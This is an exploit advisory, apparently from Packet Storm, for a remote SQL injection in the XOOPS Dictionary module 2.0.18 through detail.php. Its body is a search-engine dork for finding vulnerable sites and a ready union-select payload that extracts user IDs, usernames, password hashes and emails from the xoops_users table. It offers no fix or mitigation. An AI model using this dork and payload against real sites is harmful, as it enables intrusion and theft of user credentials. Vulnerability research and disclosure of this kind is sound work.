The XOOPS Dictionary module version 2.0.18 suffers from a remote SQL injection vulnerability.
d29a22e386ed2080b95404e0d877ced58a59980c60d2c166042387c6d5a58e7d##########################################
#
# XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
# XOOPS Version: XOOPS 2.0.18
#
# http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#
# EXPLOIT :
#
# modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed